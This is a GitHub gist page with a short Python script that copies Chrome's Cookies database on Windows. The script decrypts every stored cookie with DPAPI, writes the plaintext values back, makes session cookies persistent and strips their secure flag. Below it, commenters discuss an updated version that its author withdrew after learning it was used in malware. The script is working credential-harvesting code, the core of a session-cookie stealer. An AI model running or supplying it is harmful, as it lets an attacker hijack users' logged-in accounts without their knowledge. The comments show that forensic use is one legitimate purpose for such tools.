Skip to content

Instantly share code, notes, and snippets.

@DakuTree

DakuTree/decryptchromecookies.py

Last active September 11, 2024 06:51
Show Gist options
  • Save DakuTree/428e5b737306937628f2944fbfdc4ffc to your computer and use it in GitHub Desktop.
Save DakuTree/428e5b737306937628f2944fbfdc4ffc to your computer and use it in GitHub Desktop.
Download ZIP
Decrypt Chrome Cookies File (Python 3) - Windows
Raw
decryptchromecookies.py
#Based off https://gist.github.com/DakuTree/98c8362fb424351b803e & pieces of https://gist.github.com/jordan-wright/5770442
from os import getenv
from shutil import copyfile
import sqlite3
import win32crypt #https://sourceforge.net/projects/pywin32/
# Copy Cookies to current folder
copyfile(getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')
# Connect to the Database
conn = sqlite3.connect('./Cookies')
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT host_key, name, value, encrypted_value FROM cookies')
for host_key, name, value, encrypted_value in cursor.fetchall():
# Decrypt the encrypted_value
decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8') or value or 0
# Update the cookies with the decrypted value
# This also makes all session cookies persistent
cursor.execute('\
UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, secure = 0\
WHERE host_key = ?\
AND name = ?',
(decrypted_value, host_key, name));
conn.commit()
conn.close()
@nootkroot
Copy link

@GSapiah, yep. You can check LaZagne (https://github.com/AlessandroZ/LaZagne)

Isn't that just for passwords or does it work also for cookies? If so, how?

@GramThanos
Copy link

I updated the code to work with new chrome encryption system
https://gist.github.com/GramThanos/ff2c42bb961b68e7cc197d6685e06f10

@BayronVazquez
Copy link

I updated the code to work with new chrome encryption system https://gist.github.com/GramThanos/ff2c42bb961b68e7cc197d6685e06f10

the link is down

@GramThanos
Copy link

GramThanos commented Jan 22, 2024
edited
Loading

I updated the code to work with new chrome encryption system https://gist.github.com/GramThanos/ff2c42bb961b68e7cc197d6685e06f10

the link is down

I took the gist down. I suggest @DakuTree to do the same.

More info:
From time to time shady GitHub accounts would comment on the code and/or ask questions questions about it. I was contacted by Ran Locar and he informed me that someone used my code as part of a malware, thus I decided to take it down.

@nuvious
Copy link

nuvious commented Sep 10, 2024

@GramThanos, fully understand if you have no interest in honoring this request, but the updated script could be used in forensic analysis (which is actually what I'm looking for a solution to) as much as malware analysis. Any chance you'd be willing to put it back up? Almost all security tools used for forensics double as potential malware utilities. Again, up to you.

@GramThanos
Copy link

@nuvious I am sorry but I will stand by my decision. For forensics, there are specialised tools that export cookies.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment